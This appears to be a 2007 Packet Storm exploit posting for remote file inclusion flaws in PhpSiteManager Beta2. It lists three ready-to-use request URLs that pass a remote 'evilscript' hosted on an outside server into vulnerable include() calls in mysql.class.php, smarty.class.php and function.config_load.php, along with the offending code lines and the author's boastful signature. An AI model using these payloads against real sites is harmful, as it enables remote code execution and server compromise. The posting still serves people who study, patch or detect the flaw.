PhpSiteManager Beta2 suffers from remote file inclusion vulnerabilities.
bdbe4a0975b0c35925386fd9af5ee9ae760f6a457db5ca5a553558c578e5f161
PhpSiteManager-Beta2 Remote File Inclusion Vulnerability
Version Released 2007-05-01
------------------|
Timeline:10:11:07 |
------------------|
Download :
--------------------------------------------------------------------------------------------------------|
http://downloads.sourceforge.net/phpsitemanager/phpSiteManager-Beta2.zip?modtime=1178024627&big_mirror=0|
--------------------------------------------------------------------------------------------------------|
--------|
Exploit |
--------|
----------------------------------------------------------------------------*
/mysql.class.php?filename=http://host.com[evilscript.txt?] *
*
/smarty.class.php?smarty_compile_path=http://host.com/evilscript? *
*
/function.config_load.php?compile_file=http://host.com/evilscript? *
----------------------------------------------------------------------------*
bug:
---
mysql.class.php include($filename)
$filename = $server_root . 'cache/sql_' . $hash . '.php';
bug
---
Smarty.class.php include($_smarty_compile_path)
bug:
---
function.config_load.php include($_compile_file)
-------|
Author |
-------|
fl0 fl0w
e-mail:flo[underscore]flow[underscore]supremacy@[dot]com
site:http://fl0-fl0w.docspages.com
A renslt.org team member .."we're not the only one's but we're the best"
---|
EOF|
---|
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed